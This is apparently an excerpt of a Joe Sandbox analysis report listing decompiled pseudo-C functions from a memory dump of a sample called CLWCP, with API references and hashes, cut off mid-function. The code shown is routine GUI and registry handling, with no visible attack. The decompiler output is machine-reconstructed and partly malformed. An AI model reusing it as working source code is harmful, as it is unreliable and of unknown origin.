                                  0x0042176c
                                  0x0042176e
                                  0x00421774
                                  0x004218ab
                                  0x0042177a
                                  0x00421784
                                  0x00421789
                                  0x0042178c
                                  0x00421793
                                  0x0042179a
                                  0x004217a4
                                  0x0042179c
                                  0x0042179c
                                  0x0042179c
                                  0x004217bb
                                  0x004217d2
                                  0x004217d9
                                  0x004217de
                                  0x004217e2
                                  0x004217e4
                                  0x004217e9
                                  0x004217ee
                                  0x004217ef
                                  0x004217f4
                                  0x004217f7
                                  0x0042180d
                                  0x00421818
                                  0x0042181d
                                  0x0042181e
                                  0x00421823
                                  0x00421826
                                  0x00421843
                                  0x00421845
                                  0x00421845
                                  0x00421854
                                  0x00421861
                                  0x00421868
                                  0x0042186b
                                  0x0042186e
                                  0x0042187e
                                  0x0042187e

                                  APIs
                                  • MulDiv.KERNEL32(?,?,000009EC), ref: 004217B6
                                  • MulDiv.KERNEL32(?,?,000009EC), ref: 004217CD
                                  • 72E7AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 004217E4
                                  • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,0042189F,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00421808
                                  • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,0042187F,?,?,00000000,00000000,00000008,?,00000000,0042189F), ref: 0042183B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: BitsFileMeta
                                  • String ID: `
                                  • API String ID: 858000408-2679148245
                                  • Opcode ID: becaf64b7abf296da7e3f05bfadd4af7dbe9c22f8b0f5b765a36ee3d7b0a81ca
                                  • Instruction ID: 3577a3bfdb1a636f643890ee6f94bce1b9223119c110ac302d51c3534daa86b6
                                  • Opcode Fuzzy Hash: becaf64b7abf296da7e3f05bfadd4af7dbe9c22f8b0f5b765a36ee3d7b0a81ca
                                  • Instruction Fuzzy Hash: 2D317674A00208ABDF04EFE5D882EEEB7F8EF48700F5144A6F904EB291D6789D40D769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004438DC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 56%
                                  			E004438DC(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x470b28 == 0) {
					 *0x470b28 = E0040C078("comctl32.dll", __eax);
					if( *0x470b28 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x470b2c = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E0041A5EC(_t43, 1, 0);
				_push(_t45);
				_push(0x4439d6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x470b2c == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E00442818(_t28);
					_push(_t11);
					L0042520C();
					if(_t11 == 0) {
						_t33 =  *0x46fb30; // 0x41b618
						E0040B8EC(_t33, 1);
						E00403B64();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E00442818(_t28));
					if( *0x470b2c() != 0) {
						_t34 =  *0x46fb30; // 0x41b618
						E0040B8EC(_t34, 1);
						E00403B64();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x4439dd);
				return E00403398(_v8);
			}
















                                  0x004438dd
                                  0x004438e0
                                  0x004438e3
                                  0x004438e5
                                  0x004438ee
                                  0x004438fa
                                  0x00443909
                                  0x00443915
                                  0x00443919
                                  0x00443926
                                  0x00443926
                                  0x00443919
                                  0x00443909
                                  0x0044393b
                                  0x00443940
                                  0x00443941
                                  0x00443946
                                  0x00443949
                                  0x00443953
                                  0x0044398d
                                  0x00443992
                                  0x00443994
                                  0x00443994
                                  0x00443997
                                  0x0044399a
                                  0x0044399f
                                  0x004439a0
                                  0x004439a7
                                  0x004439a9
                                  0x004439b6
                                  0x004439bb
                                  0x004439bb
                                  0x00443955
                                  0x00443955
                                  0x0044395a
                                  0x0044395c
                                  0x0044395c
                                  0x0044395f
                                  0x00443960
                                  0x00443969
                                  0x00443972
                                  0x00443974
                                  0x00443981
                                  0x00443986
                                  0x00443986
                                  0x00443972
                                  0x004439c2
                                  0x004439c5
                                  0x004439c8
                                  0x004439d5

                                  APIs
                                    • Part of subcall function 0040C078: 739414E0.VERSION(00000000,?,00000000,0040C14E), ref: 0040C0BA
                                    • Part of subcall function 0040C078: 739414C0.VERSION(00000000,?,00000000,?,00000000,0040C131,?,00000000,?,00000000,0040C14E), ref: 0040C0EF
                                    • Part of subcall function 0040C078: 73941500.VERSION(?,0040C160,?,?,00000000,?,00000000,?,00000000,0040C131,?,00000000,?,00000000,0040C14E), ref: 0040C109
                                  • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00443910
                                  • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00443921
                                  • 73451DE0.COMCTL32(00000000,?,00000000,004439D6), ref: 004439A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: 739414$7345173941500AddressHandleModuleProc
                                  • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                  • API String ID: 978676473-3125200627
                                  • Opcode ID: 19a4e0862b6a9732a11468b3484291175a17e5700e622c07bc0f06c6e8017dd0
                                  • Instruction ID: 4e66079ba917a8b0eec32d62cdab5ff0388c5550be3c1bf98bd4efe55e5bf2ec
                                  • Opcode Fuzzy Hash: 19a4e0862b6a9732a11468b3484291175a17e5700e622c07bc0f06c6e8017dd0
                                  • Instruction Fuzzy Hash: E82183B06016009BE700BF769D56A2A76ACDB44F09B10453AF405D72E2D7BDEE40CA5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448A54, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00448A54(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				struct HINSTANCE__* _v12;
				intOrPtr _v16;
				char _v26;
				char _v32;
				char _v36;
				intOrPtr _t64;
				void* _t67;
				void* _t68;
				intOrPtr _t69;
				void* _t70;

				_t70 = __eflags;
				_t47 = __ebx;
				_t67 = _t68;
				_t69 = _t68 + 0xffffffe0;
				_push(__ebx);
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_push(_t67);
				_push(0x448b89);
				_push( *[fs:eax]);
				 *[fs:eax] = _t69;
				_v26 = 0;
				GetKeyboardLayoutNameA( &_v26);
				_v16 = E0041B004(1);
				_push(_t67);
				_push(0x448b5f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t69;
				E0041B0A4(_v16, 0x80000002);
				E0040438C( &_v36, 0xa,  &_v26);
				E00404428( &_v32, _v36, "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\");
				E0041B108(_v16, __ebx, 0, _v32, __esi);
				E0041B45C(_v16,  &_v8, "Layout File", _t70);
				_v12 = E0040D158(_v8, _t47, 0x8000);
				_push(_t67);
				_push(0x448b42);
				_push( *[fs:edx]);
				 *[fs:edx] = _t69;
				 *0x46ef28 = ( *( *(GetProcAddress(_v12, "KbdLayerDescriptor"))() + 0x28) & 1) == 1;
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x448b49);
				return FreeLibrary(_v12);
			}














                                  0x00448a54
                                  0x00448a54
                                  0x00448a55
                                  0x00448a57
                                  0x00448a5a
                                  0x00448a5d
                                  0x00448a60
                                  0x00448a63
                                  0x00448a68
                                  0x00448a69
                                  0x00448a6e
                                  0x00448a71
                                  0x00448a74
                                  0x00448a7c
                                  0x00448a8d
                                  0x00448a92
                                  0x00448a93
                                  0x00448a98
                                  0x00448a9b
                                  0x00448aa6
                                  0x00448ab6
                                  0x00448ac6
                                  0x00448ad3
                                  0x00448ae3
                                  0x00448af5
                                  0x00448afa
                                  0x00448afb
                                  0x00448b00
                                  0x00448b03
                                  0x00448b24
                                  0x00448b2d
                                  0x00448b30
                                  0x00448b33
                                  0x00448b41

                                  APIs
                                  • GetKeyboardLayoutNameA.USER32 ref: 00448A7C
                                    • Part of subcall function 0041B0A4: RegCloseKey.ADVAPI32(10940000,0041AF80,00000001,0041B022,?,?,0042487E,00000008,00000060,00000048,00000000,00424923), ref: 0041B0B8
                                    • Part of subcall function 0041B108: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,0041B20D), ref: 0041B182
                                    • Part of subcall function 0040D158: SetErrorMode.KERNEL32 ref: 0040D162
                                    • Part of subcall function 0040D158: LoadLibraryA.KERNEL32(00000000,00000000,0040D1AC,?,00000000,0040D1CA), ref: 0040D191
                                  • GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 00448B0F
                                  • FreeLibrary.KERNEL32(?,00448B49,?,00000000,00000000,00448B89), ref: 00448B3C
                                  Strings
                                  • KbdLayerDescriptor, xrefs: 00448B06
                                  • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 00448AC1
                                  • Layout File, xrefs: 00448ADB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
                                  • String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
                                  • API String ID: 3365787578-2194312379
                                  • Opcode ID: d59aa7414f8174ad7da83567718374da8409b99b73beb456147aba2d552b757a
                                  • Instruction ID: 06f1372c5ddadc0fc0c2e60767a7255cf39a4b75d2e3660f9ebf2a2a3e40dfcd
                                  • Opcode Fuzzy Hash: d59aa7414f8174ad7da83567718374da8409b99b73beb456147aba2d552b757a
                                  • Instruction Fuzzy Hash: C521E2B4A00248AFDF01EFA5CC529DEB7F6EB49304F51847AF400A7651DB3C6941CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421DE8, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00421DE8(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E0041F480(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L004066E4();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L00406374();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x421e97);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x421e9e);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00406944();
						return _t31;
					}
				}
			}

















                                  0x00421de8
                                  0x00421de9
                                  0x00421deb
                                  0x00421df3
                                  0x00421df6
                                  0x00421dfa
                                  0x00421e9e
                                  0x00421ea3
                                  0x00421e0b
                                  0x00421e19
                                  0x00421e1e
                                  0x00421e22
                                  0x00000000
                                  0x00421e24
                                  0x00421e24
                                  0x00421e26
                                  0x00421e2b
                                  0x00421e2e
                                  0x00421e31
                                  0x00421e32
                                  0x00421e37
                                  0x00421e44
                                  0x00421e49
                                  0x00421e4a
                                  0x00421e4f
                                  0x00421e52
                                  0x00421e63
                                  0x00421e6a
                                  0x00421e6d
                                  0x00421e70
                                  0x00421e7d
                                  0x00421e86
                                  0x00421e8b
                                  0x00421e8e
                                  0x00421e8f
                                  0x00421e91
                                  0x00421e96
                                  0x00421e96
                                  0x00421e22

                                  APIs
                                    • Part of subcall function 0041F480: GetObjectA.GDI32(00000000,00000004), ref: 0041F497
                                    • Part of subcall function 0041F480: 72E7AEA0.GDI32(00000000,00000000,?,00000028,00000000,00000004,?,000000FF,00000000,00000018,00000000,004220F2,00000000,00422248,?,00000000), ref: 0041F4BA
                                  • 72E7AC50.USER32(00000000), ref: 00421E26
                                  • 72E7A590.GDI32(?,00000000), ref: 00421E32
                                  • SelectObject.GDI32(?), ref: 00421E3F
                                  • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00421E97,?,?,?,?,00000000), ref: 00421E63
                                  • SelectObject.GDI32(?,?), ref: 00421E7D
                                  • DeleteDC.GDI32(?), ref: 00421E86
                                  • 72E7B380.USER32(00000000,?,?,?,?,00421E9E,?,00000000,00421E97,?,?,?,?,00000000), ref: 00421E91
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Object$Select$A590B380ColorDeleteTable
                                  • String ID:
                                  • API String ID: 980243606-0
                                  • Opcode ID: be826ef0fa2f70f41618b76c2524d2a390dd0585f97e8bb312e11ae5d0d0c545
                                  • Instruction ID: 3507d913b58894ac650eca1766204c942f21caf20000b3ba28d8b351e246ce0e
                                  • Opcode Fuzzy Hash: be826ef0fa2f70f41618b76c2524d2a390dd0585f97e8bb312e11ae5d0d0c545
                                  • Instruction Fuzzy Hash: A91121B1E002187BDB10EBE9DC51EAEB7FCEB08704F5144BABA04E7291D6799D508B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00453FAC, Relevance: 10.6, APIs: 7, Instructions: 60threadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E00453FAC(struct HICON__* __eax, short __edx) {
				short _v18;
				long _v20;
				struct tagPOINT _v28;
				struct HICON__* _t11;
				long _t16;
				struct HICON__* _t25;
				struct HWND__* _t31;
				short _t32;
				struct tagPOINT* _t34;

				_t11 = __eax;
				_t32 = __edx;
				_t25 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t25 + 0x48)) =  *((intOrPtr*)(_t25 + 0x48)) + 1;
					return _t11;
				}
				 *((short*)(__eax + 0x44)) = __edx;
				if(__edx != 0) {
					L5:
					_t11 = SetCursor(E00453F84(_t25, _t32));
					goto L6;
				}
				GetCursorPos(_t34);
				_push(_v28.y);
				_t31 = WindowFromPoint(_v28.x);
				if(_t31 == 0) {
					goto L5;
				}
				_t16 = GetWindowThreadProcessId(_t31, 0);
				if(_t16 != GetCurrentThreadId()) {
					goto L5;
				}
				_v20 = _v28 & 0x0000ffff;
				_v18 = _v28.y & 0x0000ffff;
				return SendMessageA(_t31, 0x20, _t31, SendMessageA(_t31, 0x84, 0, _v20) & 0x0000ffff | 0x200 << 0x00000010);
			}












                                  0x00453fac
                                  0x00453fb3
                                  0x00453fb5
                                  0x00453fbb
                                  0x00454046
                                  0x00454046
                                  0x00000000
                                  0x00454046
                                  0x00453fc1
                                  0x00453fc8
                                  0x00454036
                                  0x00454041
                                  0x00000000
                                  0x00454041
                                  0x00453fcb
                                  0x00453fd0
                                  0x00453fdd
                                  0x00453fe1
                                  0x00000000
                                  0x00000000
                                  0x00453fe6
                                  0x00453ff4
                                  0x00000000
                                  0x00000000
                                  0x00453ffa
                                  0x00454004
                                  0x00000000

                                  APIs
                                  • GetCursorPos.USER32 ref: 00453FCB
                                  • WindowFromPoint.USER32(?,?), ref: 00453FD8
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00453FE6
                                  • GetCurrentThreadId.KERNEL32 ref: 00453FED
                                  • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 00454016
                                  • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 0045402F
                                  • SetCursor.USER32(00000000), ref: 00454041
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                  • String ID:
                                  • API String ID: 1770779139-0
                                  • Opcode ID: c57d43a932ef160239e67c2128a84e9ecdd7c6b71d8355c857ef7937fc0a89f1
                                  • Instruction ID: f184af56feafb0872215b00da1a3adc24629ecb2e9015eb0eb1613087fa9d4db
                                  • Opcode Fuzzy Hash: c57d43a932ef160239e67c2128a84e9ecdd7c6b71d8355c857ef7937fc0a89f1
                                  • Instruction Fuzzy Hash: D301C85510431065D6306B764C81A3B79A8DFC4B99F10452FBA84AB2D3E63ECC54936E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B768, Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B768(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040B5E0(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x46fcb0; // 0x470048
				if( *_t14 == 0) {
					_t16 =  *0x46fa6c; // 0x406dc4
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x470664; // 0x400000
					LoadStringA(E004051B8(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x46fac8; // 0x470218
				E0040284C(E00402BD8(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E004088D8( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40b82c, 2,  &_v1092, 0);
			}












                                  0x0040b777
                                  0x0040b77c
                                  0x0040b784
                                  0x0040b7eb
                                  0x0040b7f0
                                  0x0040b7f4
                                  0x0040b7ff
                                  0x00000000
                                  0x0040b815
                                  0x0040b786
                                  0x0040b790
                                  0x0040b79f
                                  0x0040b7af
                                  0x0040b7c2
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0040B5E0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B5FD
                                    • Part of subcall function 0040B5E0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B621
                                    • Part of subcall function 0040B5E0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B63C
                                    • Part of subcall function 0040B5E0: LoadStringA.USER32 ref: 0040B6D2
                                  • CharToOemA.USER32 ref: 0040B79F
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040B7BC
                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B7C2
                                  • GetStdHandle.KERNEL32(000000F4,0040B82C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B7D7
                                  • WriteFile.KERNEL32(00000000,000000F4,0040B82C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B7DD
                                  • LoadStringA.USER32 ref: 0040B7FF
                                  • MessageBoxA.USER32 ref: 0040B815
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                  • String ID:
                                  • API String ID: 185507032-0
                                  • Opcode ID: 054c04a1c004d21c250cc4efb5043ce8ce781a8b84e9d576a91d104cb38680e4
                                  • Instruction ID: e04345ca450840d3a5a22f9931ed623d4f0963e459078fefbfc2eaee3cc778dc
                                  • Opcode Fuzzy Hash: 054c04a1c004d21c250cc4efb5043ce8ce781a8b84e9d576a91d104cb38680e4
                                  • Instruction Fuzzy Hash: 4E1170B21042047AD200FBA5DC42F9B77ECEB44704F40493FF695F60E2EAB8D9448B6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044F35C, Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E0044F35C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x26c),  &_v80);
					}
					_push(_t150);
					_push(0x44f52a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x26c),  &_v96);
						E004346D0(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E004333E0( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E004394B4(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x44f538);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x26c),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E0041DEAC( *((intOrPtr*)(_v8 + 0x178)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x247)) == 2 &&  *(_v8 + 0x26c) != 0) {
							GetClientRect( *(_v8 + 0x26c),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E0041DEAC( *((intOrPtr*)(_v8 + 0x178))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E0044F2D0(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x247)) == 2) {
								if(E0044F884(_v8) == 0 || E0044F31C(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E0044C430( *(_v8 + 0x26c), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E0044F2D0(_t150);
							} else {
								E0044F2D0(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

























                                  0x0044f35c
                                  0x0044f35c
                                  0x0044f35c
                                  0x0044f35c
                                  0x0044f35d
                                  0x0044f35f
                                  0x0044f362
                                  0x0044f365
                                  0x0044f36d
                                  0x0044f370
                                  0x0044f480
                                  0x0044f487
                                  0x0044f49f
                                  0x0044f49f
                                  0x0044f4a4
                                  0x0044f4a5
                                  0x0044f4aa
                                  0x0044f4ad
                                  0x0044f4b4
                                  0x0044f4c4
                                  0x0044f4d2
                                  0x0044f4da
                                  0x0044f4e0
                                  0x0044f4f3
                                  0x0044f4f3
                                  0x0044f4fe
                                  0x0044f505
                                  0x0044f508
                                  0x0044f50b
                                  0x0044f514
                                  0x00000000
                                  0x0044f524
                                  0x0044f529
                                  0x0044f376
                                  0x0044f376
                                  0x0044f379
                                  0x0044f3b9
                                  0x0044f3c7
                                  0x0044f3d5
                                  0x0044f3e4
                                  0x0044f400
                                  0x0044f41f
                                  0x0044f41f
                                  0x0044f424
                                  0x0044f427
                                  0x0044f37b
                                  0x0044f37b
                                  0x0044f37e
                                  0x0044f434
                                  0x0044f43a
                                  0x0044f444
                                  0x0044f454
                                  0x0044f465
                                  0x0044f461
                                  0x0044f461
                                  0x0044f461
                                  0x0044f470
                                  0x0044f470
                                  0x0044f384
                                  0x0044f387
                                  0x0044f532
                                  0x0044f38d
                                  0x0044f38e
                                  0x0044f394
                                  0x0044f39b
                                  0x0044f3a1
                                  0x0044f3a4
                                  0x0044f3a4
                                  0x0044f39b
                                  0x0044f387
                                  0x0044f37e
                                  0x0044f53b
                                  0x0044f53b

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                  • String ID:
                                  • API String ID: 901200654-0
                                  • Opcode ID: 5bfdd6349aa25f67a9f6ebd84a2fa1f3ff13f5fbdaf69d7e113f7426ae650eed
                                  • Instruction ID: f43634e6c3294c122433758a9ec6d4c20e310822593c055aa72f7a8fa90282fe
                                  • Opcode Fuzzy Hash: 5bfdd6349aa25f67a9f6ebd84a2fa1f3ff13f5fbdaf69d7e113f7426ae650eed
                                  • Instruction Fuzzy Hash: CF510A75A04108EFDB00DFA9D589E9EB7F8AB18314F5581B6E408EB352DB38AE45CF14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041990C, Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E0041990C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x46fdc4; // 0x470030
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
